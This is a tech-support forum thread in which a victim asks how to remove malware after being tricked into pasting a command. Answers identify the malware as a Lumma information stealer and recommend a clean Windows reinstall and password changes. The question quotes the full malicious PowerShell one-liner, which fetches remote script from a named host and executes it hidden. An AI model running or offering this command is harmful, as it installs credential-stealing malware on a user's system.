How do I turn off/get rid of a malicious software that keeps getting blocked by Microsoft Security?
I was tricked into running this code in my command line. Thankfully my antivirus is on so I was able to limit the damage, but it keeps popping up frequently and I keep getting alerts from Windows Security that the threat has been quarantined. Where can I find the source file and how do I get rid of it:
powershell.exe -W Hidden -command  $uR='https://draffeler.com/cf/afs.txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t


Please edit the question to limit it to a specific problem with enough detail to identify an adequate answer.

The specific command line shown installs a Lumma information stealer. The malicious files are dropped in $env:ALLUSERSPROFILE\extract; however, just deleting them may not be enough.

You ran code that installed something malicious.
Microsoft Antivirus notified you that it was placed under quarantine.
Yet you keep getting messages.
This means that your system is still infected with more than that one virus.
The only way to be absolutely sure that all infections are gone is to reinstall windows fresh, install all programs fresh, and be very careful with opening files from your current state, as they may have been compromised and have the infection in them too.
So its best to first make a full backup of your files so you can recover files you need.
Then reinsstall a fresh install of Windows. Don't do Reset PC, keep files.
Then restore files from your backup. It will probably not be a problem to restore word documents and excel sheets, but if you open them up and you get a message that macros have been disabled, then those files are also infected.
Lastly, change all your passwords, they are possibly compromised too.
